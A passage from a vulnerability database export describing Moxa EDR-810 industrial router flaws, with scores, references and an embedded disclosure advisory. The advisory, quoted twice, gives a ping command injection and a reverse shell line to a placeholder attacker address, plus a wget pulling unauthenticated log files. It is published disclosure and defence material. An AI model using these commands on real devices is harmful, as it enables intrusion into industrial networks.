"db": "VULHUB",
"id": "VHN-142568"
}
],
"trust": 1.35873015
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43363"
}
]
},
"last_update_date": "2023-12-18T12:43:15.424000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/support/search?psid=48041"
},
{
"title": "Patch for Moxa EDR-810 Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/192699"
},
{
"title": "Moxa EDR 810 Series Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=98758"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-142568"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"db": "NVD",
"id": "CVE-2019-10969"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10969"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/154943/moxa-edr-810-command-injection-information-disclosure.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10969"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3697/"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/moxa_all_log.tar.gz"
},
{
"trust": 0.1,
"url": "http://ip_address_moxa/moxa_all_log.tar.gz"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10963"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"db": "VULHUB",
"id": "VHN-142568"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10969"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"db": "VULHUB",
"id": "VHN-142568"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10969"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"date": "2019-10-08T00:00:00",
"db": "VULHUB",
"id": "VHN-142568"
},
{
"date": "2019-10-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"date": "2019-10-23T18:25:18",
"db": "PACKETSTORM",
"id": "154943"
},
{
"date": "2019-10-08T19:15:09.963000",
"db": "NVD",
"id": "CVE-2019-10969"
},
{
"date": "2019-10-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-43363"
},
{
"date": "2019-10-23T00:00:00",
"db": "VULHUB",
"id": "VHN-142568"
},
{
"date": "2019-10-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010769"
},
{
"date": "2019-10-23T20:15:12.053000",
"db": "NVD",
"id": "CVE-2019-10969"
},
{
"date": "2019-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR 810 Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010769"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-006"
}
],
"trust": 0.6
}
}
VAR-201910-1701
Vulnerability from variot - Updated: 2023-12-18 12:43Moxa EDR 810, all versions 5.1 and prior, allows an unauthenticated attacker to be able to retrieve some log files from the device, which may allow sensitive information disclosure. Log files must have previously been exported by a legitimate user. Moxa EDR 810 Contains a vulnerability related to information disclosure from log files.Information may be obtained. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges.
As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose†them.
The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa.
Many thanks to Moxa and ICS-CERT teams for their help.
Advisory
The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:
CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. A CVSS v3 base score of 4.3 has been calculated.
Exploitation
CVE-2019-10969 - Ping Command Injection
The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below:
Ping command injection
Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below: bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1
CVE-2019-10963 - Missing Access Control On Log Files
When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:
http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz An attacker can retrieve this archive without being authenticated on the Web interface as shown below:
wget http://192.168.0.1/MOXA_All_LOG.tar.gz
--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz Connexion à 192.168.0.1:80... connecté. requête HTTP transmise, en attente de la réponse... 200 OK Taille : 15724 (15K) [text/plain] Sauvegarde en : " MOXA_All_LOG.tar.gz "
MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s
2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]
tar ztvf MOXA_All_LOG.tar.gz
drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/ -rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini -rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini -rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini
Mitigation
It is recommended to install at least the firmware version 5.3 from Moxa website.
Timeline
2019-02-24: Vendor Disclosure 2019-02-24: Advisory sent to ICS-CERT 2019-09-30: Advisory published by Moxa 2019-10-01: Advisory published by ICS-CERT
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-1701",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "edr-810",
"scope": "lte",
"trust": 1.0,
"vendor": "moxa",
"version": "5.1"
},
{
"model": "edr-810 series",
"scope": "lte",
"trust": 0.8,
"vendor": "moxa",
"version": "5.1"
},
{
"model": "edr-810",
"scope": "lte",
"trust": 0.6,
"vendor": "moxa",
"version": "\u003c=5.1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "5.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10963"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RandoriSec",
"sources": [
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
],
"trust": 0.7
},
"cve": "CVE-2019-10963",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-10963",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2019-43364",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-10963",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10963",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-43364",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201910-005",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR 810, all versions 5.1 and prior, allows an unauthenticated attacker to be able to retrieve some log files from the device, which may allow sensitive information disclosure. Log files must have previously been exported by a legitimate user. Moxa EDR 810 Contains a vulnerability related to information disclosure from log files.Information may be obtained. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. \n\nAs usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to \u00e2\u20ac\u0153responsible disclose\u00e2\u20ac them. \n\nThe ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. \n\nMany thanks to Moxa and ICS-CERT teams for their help. \n\n\n\nAdvisory\n\nThe following two product vulnerabilities were identified in Moxa\u00e2\u20ac\u2122s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:\n\nCVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. A CVSS v3 base score of 4.3 has been calculated. \n\n\nExploitation\n\nCVE-2019-10969 - Ping Command Injection\n\nThe Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: \n\nPing command injection\n\nDue to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:\nbash -i \u003e\u0026 /dev/tcp/YOUR_IP_ADDRESS/1234 0\u003e\u00261\n\n\nCVE-2019-10963 - Missing Access Control On Log Files\n\nWhen a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:\n\nhttp://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz\nAn attacker can retrieve this archive without being authenticated on the Web interface as shown below:\n\n# wget http://192.168.0.1/MOXA_All_LOG.tar.gz\n--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz\nConnexion \u00c3 192.168.0.1:80... connect\u00c3\u00a9. \nrequ\u00c3\u00aate HTTP transmise, en attente de la r\u00c3\u00a9ponse... 200 OK\nTaille : 15724 (15K) [text/plain]\nSauvegarde en : \" MOXA_All_LOG.tar.gz \"\n\nMOXA_All_LOG.tar.gz 100%[====================================================================================================================================\u003e] 15,36K --.-KB/s ds 0s \n\n2019-02-13 17:35:19 (152 MB/s) - \" MOXA_All_LOG.tar.gz \" sauvegard\u00c3\u00a9 [15724/15724]\n\n# tar ztvf MOXA_All_LOG.tar.gz \ndrwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/\n-rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini\n-rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini\n-rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini\n\n\nMitigation\n\nIt is recommended to install at least the firmware version 5.3 from Moxa website. \n\n\n\nTimeline\n\n2019-02-24: Vendor Disclosure\n2019-02-24: Advisory sent to ICS-CERT\n2019-09-30: Advisory published by Moxa\n2019-10-01: Advisory published by ICS-CERT\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "PACKETSTORM",
"id": "154943"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10963",
"trust": 3.1
},
{
"db": "ICS CERT",
"id": "ICSA-19-274-03",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "154943",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-43364",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.3697",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"id": "VAR-201910-1701",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
}
],
"trust": 1.2587301499999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
}
]
},
"last_update_date": "2023-12-18T12:43:15.457000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "EDR-810 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/support/search?psid=48041"
},
{
"title": "Patch for Moxa EDR-810 Information Disclosure Vulnerability (CNVD-2019-43364)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/192701"
},
{
"title": "Moxa EDR 810 Series Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=98757"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "CWE-532",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10963"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/154943/moxa-edr-810-command-injection-information-disclosure.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10963"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3697/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10969"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/moxa_all_log.tar.gz"
},
{
"trust": 0.1,
"url": "http://ip_address_moxa/moxa_all_log.tar.gz"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"db": "PACKETSTORM",
"id": "154943"
},
{
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"date": "2019-10-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"date": "2019-10-23T18:25:18",
"db": "PACKETSTORM",
"id": "154943"
},
{
"date": "2019-10-08T19:15:09.900000",
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"date": "2019-10-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-12-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-43364"
},
{
"date": "2019-10-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010937"
},
{
"date": "2021-10-28T13:24:14.003000",
"db": "NVD",
"id": "CVE-2019-10963"
},
{
"date": "2021-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa EDR 810 Vulnerable to information disclosure from log files",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010937"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-005"
}
],
"trust": 0.6
}
}
VAR-201809-0947
Vulnerability from variot - Updated: 2023-12-18 12:36A command injection vulnerability in the web server functionality of Moxa EDR-810 V4.2 build 18041013 allows remote attackers to execute arbitrary OS commands with root privilege via the caname parameter to the /xml/net_WebCADELETEGetValue URI. Moxa EDR-810 Is OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The MoxaEDR-810 is a highly integrated industrial multiport secure router with firewall/NAT/VPN and hosted Layer 2 switch capabilities. There is a command injection vulnerability in the web server function of MoxaEDR-8104.2build18041013. Moxa EDR-810 is a secure router with firewall and VPN functions from Moxa
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
